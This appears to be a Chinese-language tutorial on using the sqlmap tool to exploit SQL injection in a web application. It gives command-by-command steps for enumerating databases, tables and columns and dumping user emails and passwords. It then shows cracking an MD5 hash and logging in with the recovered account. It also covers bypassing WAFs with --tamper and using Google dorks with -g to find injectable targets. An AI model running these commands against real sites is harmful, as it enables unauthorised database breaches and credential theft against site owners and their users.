sqlmap是一款非常强大的开源sql自动化注入工具,可以用来检测和利用sql注入漏洞。它由Python语言开发而成,因此运行需要安装python环境。
python环境安装教程:http://jingyan.baidu.com/album/c910274be14d64cd361d2dd8.html?picindex=2
注意:sqlmap只是用来检测和利用sql注入点的,并不能扫描出网站有哪些漏洞,使用前请先使用扫描工具扫出sql注入点。
先总结一下,使用sqlmap进行SQL爆库5步走:
判断 -u url1
爆库 -u url1 --dbs
爆表 -u url1 -D database1 --tables
爆字段 -u url1 -D database1 -T table1 --columns
爆字段信息 -u url1 -D database1 -T table1 -C "column1,column2..." --dump
一、检测注入点是否可用
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134"
参数:
-u:指定注入点url
-r:从指定路径的文本文件导入,如 -r "d:1.txt",txt文本内容通过burpsuite抓取,如下图所示:
sqlmap扫描结果:
注入结果展示:
(1)注入参数id为GET注入,注入类型有四种分别为:boolean-based blind、error-based、stacked queries、inline query。
(2)web服务器系统为windows 2003 or XP
(3)web应用程序技术为:ASP.NET, Microsoft IIS 6.0
(4)数据库类型为:SQLSERVER 2000
其中图一有若干询问语句,需要用户输入[Y/N],如果你懒得输入或者不懂怎么输入可以让程序自动输入,只需添加一个参数即可,命令如下:
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --batch
二、暴库
一条命令即可曝出该sqlserver中所有数据库名称,命令如下:
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --dbs
参数:
--dbms:探测web应用后端的数据库是什么
--dbs:dbs前面有两条杠,请看清楚。
结果:
结果显示该sqlserver中共包含7个可用的数据库。
三、web当前使用的数据库
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-db
![]()
四、web数据库使用账户
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --current-user
五、列出sqlserver所有用户
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --users
六、数据库账户与密码
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" --passwords
七、列出数据库中的表
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata --tables
参数:
-D:指定数据库名称
--tables:列出表
结果:
结果体现共列出了34张表。
八、列出表中字段
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb --columns
参数:
-D:指定数据库名称
-T:指定要列出字段的表
--columns:指定列出字段
结果:
结果显示该userb表中包含了23条字段。
九、暴字段内容
- C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --dump
参数:
-C :指定要暴的字段
--dump:将结果导出
结果:
如果字段内容太多,需要花费很多时间。可以指定导出特定范围的字段内容,命令如下:
C:Python27sqlmap>python sqlmap.py -u "http://192.168.1.150/products.asp?id=134" -D tourdata -T userb -C "email,Username,userpassword" --start 1 --stop 10 --dump
参数:
--start:指定开始的行
--stop:指定结束的行
此条命令的含义为:导出数据库tourdata中的表userb中的字段(email,Username,userpassword)中的第1到第10行的数据内容。
结果如下:
十、验证结果
通过上图结果看到其中的一个用户信息为:
email:123456@qq.com
username: 1.asp
password: 49ba59abbe56e057
通过md5解密,得到该hash的原文密码为:123456
拿到账号密码我们来测试是否可以登录,登录结果如下:
验证成功!
其他使用技巧
参数:-s
sqlmap对每一个目标都会在output路径下自动生成一个SQLite文件(默认路径 C:UsersAdministrator.sqlmapoutput),如果用户想指定读取的文件路径,就可以用这个参数。
参数:--tamper
sqlmap除了使用CHAR()函数来防止对注入数据(除单引号外)进行修改,还可以使用--tamper参数对数据做修改来绕过WAF等设备。
参数:-g
测试注入Google的搜索结果中的GET参数,如python sqlmap.py -g "inurl:".php?id=1""
选项中的大写字母为默认选择项
